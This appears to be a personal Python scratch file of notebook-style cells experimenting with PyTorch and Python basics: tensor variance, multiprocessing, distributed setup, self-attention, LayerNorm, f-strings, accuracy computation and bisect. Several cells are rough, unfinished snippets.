[-0.6308],
[0.2456],
[-0.6166],
[0.6373],
[0.7274],
[0.6922],
[-0.4024],
[0.7307],
[0.3732],
[-0.3302],
[0.8962],
[-0.0092],
[-0.2267],
[-0.0099],
[-0.7222],
[-0.6623],
[0.7853],
[0.6078],
[0.2296],
[0.6467],
[0.7990],
[0.6167],
[0.2691],
[-0.5427],
[-0.2056],
[-0.0054],
[-0.0198],
[0.7618],
[-0.7096],
[0.8028],
[-0.6109],
[-0.2490],
[0.7779],
[-0.4904],
[0.4679],
[0.4634],
[0.3221],
[0.7496],
[0.1735],
[0.3141],
[-0.2086],
[0.5977],
[-0.6703],
[-0.3363],
[0.7509],
[-0.0627],
[-0.6352],
[0.1902],
[-0.1517],
[0.6410],
[0.2344],
[-0.1618],
[-0.1435],
[-0.6199],
[0.4461],
[-0.6178],
[-0.5331],
[0.1772],
[0.3869],
[-0.7178],
[0.0540],
[0.0902],
[0.2166],
[-0.6746],
[0.7433],
[-0.3821],
[0.8573],
[0.8301],
[0.3825],
[-0.1999],
[-0.5596],
[-0.5162],
[0.7803],
[-0.2355],
[-0.0302],
[-0.6034],
[0.6656],
[0.4893],
[0.5117],
[0.8589],
[-0.2372],
[-0.4723],
[0.4306],
[-0.1686],
[0.2787],
[0.4614],
[0.4245],
[0.5650],
[-0.5362],
[0.1421]])
x1 = out1
x2 = out2
print(x1.isnan().any())
print(x2.isnan().any())
dim = 1
eps = 1e-4
diff = (x1 - x2).var(dim=dim)
print(diff.isnan().any())
ned_2 = 0.5 * ((x1 - x2).var(dim=dim) / (x1.var(dim=dim) + x2.var(dim=dim) + eps))
ned = ned_2 ** 0.5
print(ned)
# conclusion, if you only have 1 number calling .var will result in nan since 1 number doesn't have a variance.
# %%
import torch
x = torch.randn(5, 4)
print(x.isnan().any())
# %%
from argparse import Namespace
# The 2 initial objects
options_foo = Namespace(foo="foo")
options_bar = Namespace(bar="bar")
# The vars() function returns the __dict__ attribute to values of the given object e.g {field:value}.
print(vars(options_foo))
# the merged object
options_baz = Namespace(**vars(options_foo), **vars(options_bar))
print(options_baz)
# %%
import torch
x = torch.randn(5, 4)
print(x.var(dim=1).size() == torch.Size([5]))
# %%
# pretty printing dictionaries and dics of tensors
def _to_json_dict_with_strings(dictionary):
"""
Convert dict to dict with leafs only being strings. So it recursively makes keys to strings
if they are not dictionaries.
Use case:
- saving dictionary of tensors (convert the tensors to strins!)
- saving arguments from script (e.g. argparse) for it to be pretty
e.g.
"""
if type(dictionary) != dict:
return str(dictionary)
d = {k: _to_json_dict_with_strings(v) for k, v in dictionary.items()}
return d
def to_json(dic):
import types
import argparse
if type(dic) is dict:
dic = dict(dic)
else:
dic = dic.__dict__
return _to_json_dict_with_strings(dic)
def save_to_json_pretty(dic, path, mode='w', indent=4, sort_keys=True):
import json
with open(path, mode) as f:
json.dump(to_json(dic), f, indent=indent, sort_keys=sort_keys)
def pprint_dic(dic):
"""
This pretty prints a json
@param dic:
@return:
Note: this is not the same as pprint.
"""
import json
# make all keys strings recursively with their naitve str function
dic = to_json(dic)
# pretty print
# pretty_dic = json.dumps(dic, indent=4, sort_keys=True)
# print(pretty_dic)
print(json.dumps(dic, indent=4, sort_keys=True)) # only this one works...idk why
# return pretty_dic
def pprint_namespace(ns):
""" pretty prints a namespace """
pprint_dic(ns)
import torch
# import json # results in non serializabe errors for torch.Tensors
from pprint import pprint
dic = {'x': torch.randn(1, 3), 'rec': {'y': torch.randn(1, 3)}}
pprint_dic(dic)
pprint(dic)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
#
Din, Dout = 100, 1
mdl = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
# with torch.no_grad():
# mdl.fc1_l1.weight.fill_(2.0)
# mdl.fc1_l1.bias.fill_(2.0)
#
hook1 = SimilarityHook(mdl, "fc1_l1")
hook2 = SimilarityHook(mdl, "fc1_l1")
mdl.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 100
# size = 8
# start CCA comparision
lb, ub = -1, 1
with torch.no_grad():
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
mdl(x)
d1 = hook1.distance(hook2)
d2 = hook1.distance(hook2, size=4)
d3 = hook1.distance(hook2, size=None)
print(f'{d1=}')
print(f'{d2=}')
print(f'{d3=}')
# %%
# https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html
# https://datascience.stackexchange.com/questions/15135/train-test-validation-set-splitting-in-sklearn
from sklearn.model_selection import train_test_split
# overall split 85:10:5
X = list(range(100))
y = list(range(len(X)))
# first do 85:15 then do 2:1 for val split
# its ok to set it to False since its ok to shuffle but then allow reproducibility with random_state
# shuffle = False # shufflebool, default=True, Whether or not to shuffle the data before splitting. If shuffle=False then stratify must be None.
random_state = 1 # Controls the shuffling applied to the data before applying the split. Pass an int for reproducible output across multiple function calls.
test_size = 0.15
X_train, X_val_test, y_train, y_val_test = train_test_split(X, y, test_size=test_size, random_state=random_state)
print(len(X_train))
print(len(X_val_test))
# then 2/3 for val, 1/3 for test to get 10:5 split
test_size = 1.0 / 3.0
X_val, X_test, y_val, y_test = train_test_split(X_val_test, y_val_test, test_size=test_size, random_state=random_state)
print(len(X_val))
print(len(X_test))
# %%
# %%
"""
global interpreter lock
The mechanism used by the CPython (the cononical implementation of the Python PL)
interpreter to assure that only one thread executes Python bytecode at a time.
However, some extension modules, either standard or third-party,
are designed so as to release the GIL when doing computationally-intensive
tasks such as compression or hashing. Also, the GIL is always released when doing I/O.
Past efforts to create a “free-threaded” interpreter
(one which locks shared data at a much finer granularity)
have not been successful because performance suffered in the
common single-processor case. It is believed that overcoming this performance
issue would make the implementation much more complicated
and therefore costlier to maintain.
According to this post multiprocessing library is the right library to use (and not asyncio)
https://leimao.github.io/blog/Python-Concurrency-High-Level/
nice basic python mp tutorial: https://docs.python.org/3/library/multiprocessing.html
TODO:
- spawn vs fork: https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Process.run
"""
# The multiprocessing package offers both local and remote concurrency,
# effectively side-stepping the Global Interpreter Lock by using subprocesses instead of threads.
# Due to this, the multiprocessing module allows the programmer
# to fully leverage multiple processors on a given machine.
# It runs on both Unix and Windows.
# from multiprocessing.context import Process
import os
import time
from multiprocessing import Process
from multiprocessing import Pool
# Ex1: compute a map in parallel
def f(x):
# time.sleep(1)
return x * x
def main1():
with Pool(5) as pool:
print(pool.map(f, [1, 2, 3, 4, 5]))
# Ex2: example of start and join
def f2(name):
print('hello', name)
def main2():
p = Process(target=f2, args=('bob',))
p.start()
p.join()
# Ex3: example of halting the line like in go and then continuing after everyone is done
def f3(arg):
print('--- Inside process ---')
print(f'args to f3 is {arg}!')
print('parent process:', os.getppid())
pid = os.getpid()
print(f'process started with pid={pid}')
time.sleep(1)
print(f'--- process done with pid={pid}')
print('--- Inside process ---')
def main3():
"""
Example of how to wait incorrectly (it will not work since it will start a process but not
start the next until the current one is done)
:return:
"""
print(f'main process pid {os.getpid()}')
num_processes = 4
processes = [Process(target=f3, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
print()
print(p)
p.start()
print(f'starting from the main process (pid={os.getpid()}) process with pid {p.pid}')
p.join() # wrong!
print('main 3 done')
def main4():
"""
Example of how to wait correctly, it blocks for all processes but calls p.start() on all of them first
:return:
"""
print(f'main process pid {os.getpid()}')
num_processes = 4
processes = [Process(target=f3, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
print()
print(p)
p.start()
print(f'starting from the main process (pid={os.getpid()}) process with pid {p.pid}')
# wait group! call join on all processes and block until they are all done
for p in processes:
p.join()
print('main 4 done')
# Ex5: wait group implementation (i.e. block until all process declare they are done)
def heavy_compute(args, secs=1):
time.sleep(secs)
def serial_code_blocking_wrong():
"""
Example of how to wait incorrectly (it will not work since it will start a process but not
start the next until the current one is done)
:return:
"""
num_processes = 4
processes = [Process(target=heavy_compute, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
p.start()
p.join() # wrong!
def parallel_code_blocking_correctly():
"""
Example of how to wait incorrectly (it will not work since it will start a process but not
start the next until the current one is done)
:return:
"""
num_processes = 4
processes = [Process(target=heavy_compute, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
p.start()
# wait group! call join on all processes and block until they are all done
for p in processes:
p.join()
def main5():
start = time.time()
serial_code_blocking_wrong()
print(f'serial (wrong) execution time = {time.time() - start}')
start = time.time()
parallel_code_blocking_correctly()
print(f'parallel execution time = {time.time() - start}')
# first should be 4 secs second should 1 second
if __name__ == '__main__':
start = time.time()
# main1()
# main2()
# main3()
# main4()
main5()
print(f'total execution time = {time.time() - start}')
print('Done with __main__!\a\n')
# %%
"""
Goal: train in a mp way by computing each example in a seperate process.
tutorial: https://pytorch.org/docs/stable/notes/multiprocessing.html
full example: https://github.com/pytorch/examples/blob/master/mnist_hogwild/main.py
Things to figure out:
- fork or spwan for us? see pytorch but see this too https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Process.run
- shared memory
- do we need num_workers=0, 1 or 2? (one for main thread other for pre-fetching batches)
- run test and check that the 112 process do improve the time for a loop (add progress part for dataloder
docs: https://pytorch.org/docs/stable/multiprocessing.html#module-torch.multiprocessing
(original python mp, they are compatible: https://docs.python.org/3/library/multiprocessing.html)
"""
# from datetime import time
#
# import torch
# from torch.multiprocessing import Pool
#
#
# def train(cpu_parallel=True):
# num_cpus = get_num_cpus() # 112 is the plan for intel's clsuter as an arparse or function
# model.shared_memory() # TODO do we need this?
# # add progressbar for data loader to check if multiprocessing is helping
# for batch_idx, batch in dataloader:
# # do this mellow with pool when cpu_parallel=True
# with Pool(num_cpus) as pool:
# losses = pool.map(target=model.forward, args=batch)
# loss = torch.sum(losses)
# # now do .step as normal
#
#
# if __name__ == '__main__':
# start = time.time()
# train()
# print(f'execution time: {time.time() - start}')
# %%
import torch
print(torch.multiprocessing.get_all_sharing_strategies())
print(torch.multiprocessing.get_sharing_strategy())
torch.multiprocessing.set_sharing_strategy('file_system')
# %%
# getting the id of the process wrt to the pooling: https://stackoverflow.com/questions/10190981/get-a-unique-id-for-worker-in-python-multiprocessing-pool
import multiprocessing
def f(x):
print(multiprocessing.current_process())
return x * x
p = multiprocessing.Pool()
print(p.map(f, range(6)))
# %%
import torch
import torch.nn as nn
from torch.utils.data import Dataset
from torch.multiprocessing import Pool
# class SimpleDataSet(Dataset):
#
# def __init__(self, D, num_examples=20):
# self.data = [torch.randn(D) for _ in range(num_examples)]
#
# def __len__(self):
# return len(self.data)
#
# def __getitem__(self, idx):
# return self.data[idx]
def main():
Din, Dout = 3, 1
model = nn.Linear(Din, Dout)
criterion = nn.MSELoss()
def get_loss(data_point):
x, y = data_point
y_pred = model(x)
loss = criterion(y_pred, y)
return loss
batch_size = 3
num_epochs = 10
num_batches = 5
num_procs = 5
for epoch in range(num_epochs):
for i in range(num_batches):
batch = [(torch.randn(Din), torch.randn(Dout)) for _ in range(batch_size)]
with Pool(num_procs) as pool:
losses = pool.map(get_loss, batch)
loss = torch.avg(losses)
loss.backward()
if __name__ == '__main__':
main()
# %%
# counting number of processors: https://stackoverflow.com/questions/23816546/how-many-processes-should-i-run-in-parallel
# %%
# # List of tuples
# students = [('jack', 34, 'Sydeny', 'Australia'),
# ('Riti', 30, 'Delhi', 'India'),
# ('Vikas', 31, 'Mumbai', 'India'),
# ('Neelu', 32, 'Bangalore', 'India'),
# ('John', 16, 'New York', 'US'),
# ('Mike', 17, 'las vegas', 'US')]
# # Create DataFrame object from a list of tuples
# dfObj = pd.DataFrame(students, columns=['Name', 'Age', 'City', 'Country'], index=['a', 'b', 'c', 'd', 'e', 'f'])
# %%
"""
Goal: train in a mp way by computing each example in a seperate process.
tutorial: https://pytorch.org/docs/stable/notes/multiprocessing.html
full example: https://github.com/pytorch/examples/blob/master/mnist_hogwild/main.py
Things to figure out:
- fork or spwan for us? see pytorch but see this too https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Process.run
- shared memory
- do we need num_workers=0, 1 or 2? (one for main thread other for pre-fetching batches)
- run test and check that the 112 process do improve the time for a loop (add progress part for dataloder
docs: https://pytorch.org/docs/stable/multiprocessing.html#module-torch.multiprocessing
(original python mp, they are compatible: https://docs.python.org/3/library/multiprocessing.html)
"""
# def train(cpu_parallel=True):
# num_cpus = get_num_cpus() # 112 is the plan for intel's clsuter as an arparse or function
# model.shared_memory() # TODO do we need this?
# # add progressbar for data loader to check if multiprocessing is helping
# for batch_idx, batch in dataloader:
# # do this mellow with pool when cpu_parallel=True
# with Pool(num_cpus) as pool:
# losses = pool.map(target=model.forward, args=batch)
# loss = torch.sum(losses)
# # now do .step as normal
# https://github.com/pytorch/examples/blob/master/mnist/main.py
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import StepLR
from torch.utils.data import Dataset, DataLoader
from torch.multiprocessing import Pool
class SimpleDataSet(Dataset):
def __init__(self, Din, num_examples=23):
self.x_dataset = [torch.randn(Din) for _ in range(num_examples)]
# target function is x*x
self.y_dataset = [x ** 2 for x in self.x_dataset]
def __len__(self):
return len(self.x_dataset)
def __getitem__(self, idx):
return self.x_dataset[idx], self.y_dataset[idx]
def get_loss(args):
x, y, model = args
y_pred = model(x)
criterion = nn.MSELoss()
loss = criterion(y_pred, y)
return loss
def get_dataloader(D, num_workers, batch_size):
ds = SimpleDataSet(D)
dl = DataLoader(ds, batch_size=batch_size, num_workers=num_workers)
return dl
def train_fake_data():
num_workers = 2
Din, Dout = 3, 1
model = nn.Linear(Din, Dout).share_memory()
optimizer = torch.optim.Adam(model.parameters(), lr=0.1)
batch_size = 2
num_epochs = 10
# num_batches = 5
num_procs = 5
dataloader = get_dataloader(Din, num_workers, batch_size)
scheduler = StepLR(optimizer, step_size=1, gamma=0.7)
for epoch in range(num_epochs):
for _, batch in enumerate(dataloader):
batch = [(torch.randn(Din), torch.randn(Dout), model) for _ in batch]
with Pool(num_procs) as pool:
optimizer.zero_grad()
losses = pool.map(get_loss, batch)
loss = torch.mean(losses)
loss.backward()
optimizer.step()
# scheduler
scheduler.step()
if __name__ == '__main__':
# start = time.time()
# train()
train_fake_data()
# print(f'execution time: {time.time() - start}')
# %%
"""
The distributed package included in PyTorch (i.e., torch.distributed) enables researchers and practitioners to
easily parallelize their computations across processes and clusters of machines.
As opposed to the multiprocessing (torch.multiprocessing) package, processes can use different communication backends
and are not restricted to being executed on the same machine.
https://pytorch.org/tutorials/intermediate/dist_tuto.html
"""
"""run.py:"""
# !/usr/bin/env python
import os
import torch
import torch.distributed as dist
from torch.multiprocessing import Process
def run(rank, size):
"""
Distributed function to be implemented later.
This is the function that is actually ran in each distributed process.
"""
pass
def init_process_and_run_parallel_fun(rank, size, fn, backend='gloo'):
"""
Initialize the distributed environment (for each process).
gloo: is a collective communications library (https://github.com/facebookincubator/gloo). My understanding is that
it's a library for process to communicate/coordinate with each other/master. It's a backend library.
"""
# set up the master's ip address so this child process can coordinate
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
# TODO: I think this is what makes sure that each process can talk to master,
dist.init_process_group(backend, rank=rank, world_size=size)
# run parallel function
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
# target is the function the (parallel) process will run with args
p = Process(target=init_process_and_run_parallel_fun, args=(rank, size, run))
p.start() # start process
processes.append(p)
# wait for all processes to finish by blocking one by one (this code could be problematic see spawn: https://pytorch.org/docs/stable/multiprocessing.html#spawning-subprocesses )
for p in processes:
p.join() # blocks until p is done
# %%
# split string
print("asdf-ghjkl;".split('-'))
# %%
# what happens if we do a .item of a vector
x = torch.randn(1)
print(x.item())
y = torch.randn(1, 1)
print(y.item())
z = torch.randn(1, 4)
print(z.item())
# %%
# attention mechanism from transformers
# inspired from but slightly modified to match equations from paper properly (better vectorization)
# https://towardsdatascience.com/illustrated-self-attention-2d627e33b20a
# -- get data set, each row is an input [N by D] --
import torch
x = [
[1.0, 0, 1, 0], # Input 1
[0, 2, 0, 2], # Input 2
[1, 1, 1, 1] # Input 3
]
x = torch.tensor(x)
print('Usual design matrix where the rows N is the # of examples and D columns the features [N, D]')
print(f'X = [N, D] = {x.size()}\n')
# -- get query, key, value matrices
w_key = [
[0.0, 0, 1],
[1, 1, 0],
[0, 1, 0],
[1, 1, 0]
]
w_query = [
[1.0, 0, 1],
[1, 0, 0],
[0, 0, 1],
[0, 1, 1]
]
w_value = [
[0.0, 2, 0],
[0, 3, 0],
[1, 0, 3],
[1, 1, 0]
]
w_key = torch.tensor(w_key)
w_query = torch.tensor(w_query)
w_value = torch.tensor(w_value)
print(f'w_key = [D, D_k] = {w_key.size()}')
print(f'w_qry = [D, D_qry] = {w_query.size()}')
print(f'w_val = [D, D_v] = {w_value.size()}\n')
# -- get Q, K, V matrices for each inputs --
keys = x @ w_key
querys = x @ w_query
values = x @ w_value # [N, D] [D, Dv] = [N, Dv]
# print(keys)
# print(querys)
# print(values)
print(f'keys = K = [N, D_k] = {keys.size()}')
print(f'qry = Q = [N, D_q] = {querys.size()}')
print(f'val = V = [N, D_v] = {values.size()}\n')
# -- calculate attention socres --
# [q1 ; q2; q3 ] @ [k1, k2, k3]
attn_scores = querys @ keys.T
print('Attention scores Q @ K.T')
print(f'attn_scores = [N, N] = {attn_scores.size()}')
print(f'each row i indicates how query values for input i compares to the keys for all others inputs\n')
# -- get real attention --
# have rows sum to 1
attn_scores_softmax = attn_scores.softmax(dim=1)
print(attn_scores_softmax[0, :].sum())
print(attn_scores_softmax[0, :])
print('a[0,0]=<q0, k0>, a[0,1]=<q0,k1> , a[0,2]=<q0,k2>')
# print(attn_scores_softmax)
print(
'Thus, each row i is a (normalized) weight [0,1] indicating how much each qry input i compares to all others inputs keys')
# For readability, approximate the above as follows
attn_scores_softmax = [
[0.0, 0.5, 0.5],
[0.0, 1.0, 0.0],
[0.0, 0.9, 0.1]
]
attn_scores_softmax = torch.tensor(attn_scores_softmax)
# -- --
# the output of attention from the tutorial:
print((values[:, None] * attn_scores_softmax.T[:, :, None]).sum(dim=0))
# using the equation from the paper [N, N] [N, Dv] = [N, Dv]
sf_qk_v = attn_scores_softmax @ values
print('Here is the attentted "context" vectors!')
print(f'Atten(QK.T) @ V = A*V = [N, Dv] = {sf_qk_v.size()}')
print(sf_qk_v)
print((values[:, None] * attn_scores_softmax.T[:, :, None]).sum(dim=0))
print('Each row i is a context vector weighted with qry i with all keys for 1...Tx by vectors v 1...Tx')
print('i.e. AV[i,:] = sum^Tx_{t=1} a[i,t] v[:,i]')
# %%
#
# from pathlib import Path
# from types import SimpleNamespace
# from torch.utils.tensorboard import SummaryWriter
#
# import pickle
#
# args = SimpleNamespace(log_dir=Path('~/Desktop/').expanduser())
# tb = import torch
#
# class ResNet(torch.nn.Module):
# def __init__(self, module):
# super().__init__()
# self.module = module
#
# def forward(self, inputs):
# return self.module(inputs) + inputsSummaryWriter(log_dir=args.log_dir) # uncomment for documentation to work
#
# # TypeError: cannot pickle 'tensorflow.python._pywrap_file_io.WritableFile' object
# pickle.dump(tb, open(args.log_dir / 'tb_test' ,'w'))
# %%
import torch
class ResNet(torch.nn.Module):
def __init__(self, module):
super().__init__()
self.module = module
def forward(self, inputs):
return self.module(inputs) + inputs
#
# mdl = nn.Sequential()
# %%
# layer norm
import torch.nn as nn
input = torch.randn(20, 5, 10, 10)
# With Learnable Parameters
m = nn.LayerNorm(input.size()[1:])
# Without Learnable Parameters
m = nn.LayerNorm(input.size()[1:], elementwise_affine=False)
# Normalize over last two dimensions
m = nn.LayerNorm([10, 10])
# Normalize over last dimension of size 10
m = nn.LayerNorm(10)
# Activating the module
output = m(input)
input = torch.randn(20, 256)
# With Learnable Parameters
m = nn.LayerNorm(normalized_shape=256)
# Without Learnable Parameters
# m = nn.LayerNorm(input.size()[1:], elementwise_affine=False)
# Normalize over last two dimensions
# m = nn.LayerNorm([10, 10])
# Normalize over last dimension of size 10
# m = nn.LayerNorm(10)
# Activating the module
output = m(input)
print(output.size())
print('-- testing batch size 1 --')
input = torch.randn(1, 256)
# With Learnable Parameters
m = nn.LayerNorm(normalized_shape=256)
# Without Learnable Parameters
# m = nn.LayerNorm(input.size()[1:], elementwise_affine=False)
# Normalize over last two dimensions
# m = nn.LayerNorm([10, 10])
# Normalize over last dimension of size 10
# m = nn.LayerNorm(10)
# Activating the module
output = m(input)
print(output.size())
# %%
# f string formatting
# https://miguendes.me/73-examples-to-help-you-master-pythons-f-strings#how-to-add-leading-zeros
# fixed digits after f f-string
print(f'{10.1234:.2f}')
# add 5 leading zeros (note you need the 0 infront of 5
print(f'{42:05}')
num = 42
f"{num:05}"
'00042'
f'{num:+010}'
'+000000042'
f'{num:-010}'
'0000000042'
f"{num:010}"
'0000000042'
num = -42
f'{num:+010}'
'-000000042'
f'{num:010}'
'-000000042'
f'{num:-010}'
'-000000042'
# %%
# https://pytorch.org/docs/stable/generated/torch.nn.Transformer.html
# https://pytorch.org/tutorials/beginner/transformer_tutorial.html
# src = torch.rand((10, 32, 512))
# tgt = torch.rand((20, 32, 512))
# out = transformer_model(src, tgt)
# %%
loss = nn.CrossEntropyLoss()
input = torch.randn(3, 5, requires_grad=True)
print(input.dtype)
target = torch.empty(3, dtype=torch.long).random_(5)
print(target.dtype)
output = loss(input, target)
output.backward()
# %%
print(spt_logits_t.dtype)
print(spt_y_t.dtype)
inner_loss = self.args.criterion(spt_logits_t, spt_y_t)
# %%
# view(-1), view(-1, 1)
# https://stackoverflow.com/questions/50792316/what-does-1-mean-in-pytorch-view
# the actual value for this dimension will be inferred so that the number of elements in the view matches
# the original number of elements.
import torch
x = torch.randn(1, 5)
x = x.view(-1)
print(x.size())
x = torch.randn(2, 4)
x = x.view(-1, 8)
print(x.size())
x = torch.randn(2, 4)
x = x.view(-1)
print(x.size())
x = torch.randn(2, 4, 3)
x = x.view(-1)
print(x.size())
# %%
import torch
x = torch.randn(torch.Size([5, 1028]))
y = torch.randn(torch.Size([5, 1028]))
# x = (y == x).view(-1)
x = (y == x).reshape(-1)
print(x.size())
# %%
# contiguous vs non-contiguous tensors
# https://discuss.pytorch.org/t/contigious-vs-non-contigious-tensor/30107
# seems view vs reshape care about
# note that sometimes `view` doesn't work due
# to contiguous/non-contiguous memory so call `reshape(...)`
# instead: https://discuss.pytorch.org/t/contigious-vs-non-contigious-tensor/30107 and see https://stackoverflow.com/questions/49643225/whats-the-difference-between-reshape-and-view-in-pytorch
# https://stackoverflow.com/questions/48915810/pytorch-contiguous
# https://stackoverflow.com/questions/54095351/in-pytorch-what-makes-a-tensor-have-non-contiguous-memory
# https://stackoverflow.com/questions/42479902/how-does-the-view-method-work-in-pytorch
# %%
# nhttps://pytorch.org/transformers_pytorch/beginner/transformer_tutorial.html
# positional encoder pytorch
# transformer docs
# where S is the source sequence length,
# T is the target sequence length, N is the batch size, E is the feature number
import torch
import torch.nn as nn
class PositionalEncoding(nn.Module):
def __init__(self, d_model, dropout=0.1, max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
transformer_model = nn.Transformer(nhead=16, num_encoder_layers=12)
src = torch.rand((10, 32, 512))
tgt = torch.rand((20, 32, 512))
out = transformer_model(src, tgt)
# generate_square_subsequent_mask(sz)[SOURCE]
# Generate a square mask for the sequence.
# The masked positions are filled with float(‘-inf’).
# Unmasked positions are filled with float(0.0).
# output = transformer_model(src, tgt, src_mask=src_mask, tgt_mask=tgt_mask)
# Transformer Layers
# nn.Transformer
#
# A transformer model.
#
# nn.TransformerEncoder
#
# TransformerEncoder is a stack of N encoder layers
#
# nn.TransformerDecoder
#
# TransformerDecoder is a stack of N decoder layers
#
# nn.TransformerEncoderLayer
#
# TransformerEncoderLayer is made up of self-attn and feedforward network.
#
# nn.TransformerDecoderLayer
#
# TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.
print(out.size())
# %%
# attention
# where S is the source sequence length, T is the target sequence length, N is the batch size, E is the feature number
# src: (S, N, E)(S,N,E) .
# tgt: (T, N, E)(T,N,E) .
# src_mask: (S, S)(S,S) .
# tgt_mask: (T, T)(T,T)
import torch
import torch.nn as nn
batch_size = 4
S = 12
T = 17
d_model = 8
nhead = 1
transformer_model = nn.Transformer(d_model=d_model, nhead=nhead, num_decoder_layers=6, num_encoder_layers=6)
src = torch.rand((S, batch_size, d_model))
tgt = torch.rand((T, batch_size, d_model))
out = transformer_model(src, tgt)
print(out.size())
mha = nn.MultiheadAttention(embed_dim=d_model, num_heads=nhead)
qry = src
key = src
value = src
out = mha(qry, key, value)
print(len(out))
# Shapes for outputs:
# attn_output: (L, N, E) where L is the target sequence length, N is the batch size, E is the embedding dimension.
# attn_output_weights: (N, L, S) where N is the batch size,
# L is the target sequence length, S is the source sequence length.
print(out[0].size())
print(out[1].size())
# %%
# https://stackoverflow.com/questions/52981833/sklearn-python-log-loss-for-logistic-regression-evaluation-raised-an-error/66569833#66569833
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from sklearn import metrics
X, y = load_iris(return_X_y=True)
clf = LogisticRegression(random_state=0).fit(X, y)
clf.predict(X[:2, :])
clf.predict_proba(X[:2, :])
clf.score(X, y)
y_probs = cls.predict_proba(X)
qry_loss_t = metrics.log_loss(y, y_probs)
# %%
# refs:
# https://stackoverflow.com/questions/51503851/calculate-the-accuracy-every-epoch-in-pytorch
# https://discuss.pytorch.org/t/how-to-calculate-accuracy-in-pytorch/80476/5
# https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649
# how to get the class prediction
batch_size = 4
n_classes = 2
y_logits = torch.randn(batch_size, n_classes) # usually the scores
print('scores (logits) for each class for each example in batch (how likely a class is unnormalized)')
print(y_logits)
print('the max over entire tensor (not usually what we want)')
print(y_logits.max())
print('the max over the n_classes dim. For each example in batch returns: '
'1) the highest score for each class (most likely class)\n, and '
'2) the idx (=class) with that highest score')
print(y_logits.max(1))
print('-- calculate accuracy --')
# computing accuracy in pytorch
"""
random.choice(a, size=None, replace=True, p=None)
Generates a random sample from a given 1-D array
for pytorch random choice https://stackoverflow.com/questions/59461811/random-choice-with-pytorch
"""
import torch
import torch.nn as nn
in_features = 1
n_classes = 10
batch_size = n_classes
mdl = nn.Linear(in_features=in_features, out_features=n_classes)
x = torch.randn(batch_size, in_features)
y_logits = mdl(x) # scores/logits for each example in batch [B, n_classes]
# get for each example in batch the label/idx most likely according to score
# y_max_idx[b] = y_pred[b] = argmax_{idx \in [n_classes]} y_logit[idx]
y_max_scores, y_max_idx = y_logits.max(dim=1)
y_pred = y_max_idx # predictions are really the inx \in [n_classes] with the highest scores
y = torch.randint(high=n_classes, size=(batch_size,))
# accuracy for 1 batch
assert (y.size(0) == batch_size)
acc = (y == y_pred).sum() / y.size(0)
acc = acc.item()
print(y)
print(y_pred)
print(acc)
# %%
# topk accuracy
# torch.topk = Returns the k largest elements of the given input tensor along a given dimension.
import torch
batch_size = 2
n_classes = 3
y_logits = torch.randn(batch_size, n_classes)
print('- all values in tensor x')
print(y_logits)
print('\n- for each example in batch get top 2 most likely values & classes/idx (since dim=1 is the dim for classes)'
'\n1) first are the actual top 2 scores & 2) then the indicies/classes corresponding those largest scores')
print(y_logits.topk(k=2, dim=1))
# %%
from copy import deepcopy
from pathlib import Path
path_cluster = '/home/miranda9/data/logs/logs_Mar06_11-15-02_jobid_0_pid_3657/tb'
path_cluster_intel = '/homes/miranda9/data/logs/logs_Dec04_15-49-00_jobid_446010.iam-pbs/tb'
path_vision = '/home/miranda9/data/logs/logs_Dec04_18-39-14_jobid_1528/tb'
dirs = path_cluster.split('/')
for dir_name in deepcopy(dirs):
if dir_name == 'data':
break
else:
dirs.pop(0)
dirs = ['~'] + dirs
dirs = '/'.join(dirs)
dir = Path(dirs).expanduser()
path_cluster.replace('/home/miranda9/', '~')
print(dir)
# %%
# floats f-string
var = 1.0
print(f'{var}')
# f adds many ugly 0's
var = 1
print(f'{var:f}')
var = 0.0001
print(f'{var}')
# ok it truncates, no!
var = 1.0
print(f'{var:.2f}')
var = 0.0001
print(f'{var:.2f}')
# %%
import bisect
from collections import OrderedDict
p = 0
x = bisect.bisect_left([10, 20], p)
print(x)
p = 10
x = bisect.bisect_left([10, 20], p)
print(x)
p = 11
x = bisect.bisect_left([10, 20], p)
print(x)
p = 21
x = bisect.bisect_left([10, 20], p)
print(x)
#
# p = 10
# x = bisect.bisect_left(OrderedDict({10: 'a', 11: 'b'}), p)
# print()
# %%
# for indexing into an interval to get the index the value corresponds to
import bisect
flatten_lst_files = ['f1', 'f2', 'f3']
cummulative_end_index = [4, 5 + 6, 5 + 7 + 1]
print(cummulative_end_index)
files = {'f1': list(range(5)), 'f2': list(range(7)), 'f3': list(range(2))}
def get_lower_cummulative(file_idx):
if file_idx == 0:
return file_idx
else:
return cummulative_end_index[file_idx - 1] + 1
def get_node_idx(idx):
# gets the index for the value we want
file_idx = bisect.bisect_left(cummulative_end_index, idx)
# now get the actual value
file = flatten_lst_files[file_idx]
print(file)
